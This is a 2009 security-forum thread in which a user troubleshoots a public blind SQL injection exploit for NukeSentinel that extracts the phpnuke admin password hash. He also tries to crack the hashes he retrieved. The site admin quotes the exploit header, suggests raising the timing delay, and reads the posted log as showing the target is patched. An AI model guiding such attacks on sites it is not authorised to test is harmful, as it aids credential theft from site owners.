Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 74
Members: 0
Total: 74
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> MD5 hashes -> MD5 from outdated Sentinel
Post new topicReply to topic View previous topic :: View next topic
MD5 from outdated Sentinel
PostPosted: Wed Mar 25, 2009 8:51 pm Reply with quote
rager
Beginner
Beginner
Joined: Mar 25, 2009
Posts: 4




I ran the script made by the admin, for some reason it usually fails. However, after many times of trying, I managed to get an MD5
5436b1c57ccbc13a172bba16d5b0ea26
and after some more time i tried again and got a new md5, odd is it not?
114ca4db005102435aa44d3a2bb0d3b0
and then I tried again after many failures and got another md5
a8c632c266abbedd8faef3e5ddddc2c2
Are these MD5s even the right ones? If so, can someone crack em? I tried cracking em with a 25gb list, no luck.
View user's profile Send private message
PostPosted: Wed Mar 25, 2009 8:58 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




What script did you use? I assume, that it's works via delay-based blind sql injection, so yes, you may get invalid results, if server or network connection is slow or unstable. You can try to increase delay value, this may help. Anyway, correct result must be repeatable, you must get exactly the same hash every time or it is not working correctly.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Mar 25, 2009 9:03 pm Reply with quote
rager
Beginner
Beginner
Joined: Mar 25, 2009
Posts: 4




used your script bud. ive gotten the has to be 0000000000000 more often than any other MD5. which is 2x but i dont think thats right.
View user's profile Send private message
PostPosted: Wed Mar 25, 2009 9:48 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You mean this exploit:

Code:

// NukeSentinel 2.5.11 "nsbypass.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 23. april 2008
//
// This exploit will fetch phpnuke God admin password's md5 hash
// Ref: waraxe-2007-SA#053
// http://www.waraxe.us/advisory-53.html
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$url = 'http://localhost/phpnuke.7.9/includes/nsbypass.php';
$outfile = './attack_log.txt';// Log file
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
//======================================================================
...
...


Try to change this variable:
Code:

$testcnt = 300000;// Use bigger numbers, if server is slow, default is


For example:
Code:

$testcnt = 1000000;


You should see bigger delays from server.
By the way - target can be patched allready, in that case exploit will obviously not work.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Mar 25, 2009 10:14 pm Reply with quote
rager
Beginner
Beginner
Joined: Mar 25, 2009
Posts: 4




Code:
....includes/nsbypass.php testing probe delays 4 2 2 2 2 2 mean nondelayed - 2 dsecs mean delayed - 2 dsecs normal delay: 2 deciseconds finding hash now ... char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 1 --> 0 current value for hash: 0 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 2 --> 0 current value for hash: 00 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 3 --> 0 current value for hash: 000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 4 --> 0 current value for hash: 0000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got hash pos 5 --> 0 current value for hash: 00000 test_condition() - try 1 - invalid return value ... trying again - try 2 ... test_condition() - try 2 - invalid return value ... trying again - try 3 ... test_condition() - try 3 - invalid return value ... trying again - try 4 ... test_condition() - try 4 - invalid return value ... trying again - try 5 ... test_condition() - try 5 - invalid return value ... trying again - try 6 ... test_condition() - try 6 - invalid return value ... trying again - try 7 ... test_condition() - try 7 - invalid return value ... trying again - try 8 ... test_condition() - try 8 - invalid return value ... trying again - try 9 ... test_condition() - try 9 - invalid return value ... trying again - try 10 ... test_condition() - try 10 - invalid return value ... too many tries - exiting ...


This happens very frequently. I acutally got very frustrated and started making the value 99999999999999999999999999999999999999999. lol. I'll keep you updated.
View user's profile Send private message
PostPosted: Thu Mar 26, 2009 12:23 am Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Code:

mean nondelayed - 2 dsecs
mean delayed - 2 dsecs


As you can see - both response times are the same, about 200 ms.
So this security vulnerability is patched and specific exploit does not work.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Mar 26, 2009 12:35 am Reply with quote
rager
Beginner
Beginner
Joined: Mar 25, 2009
Posts: 4




thanks for the feedback. Very Happy
View user's profile Send private message
MD5 from outdated Sentinel
www.waraxe.us Forum Index -> MD5 hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.052 Seconds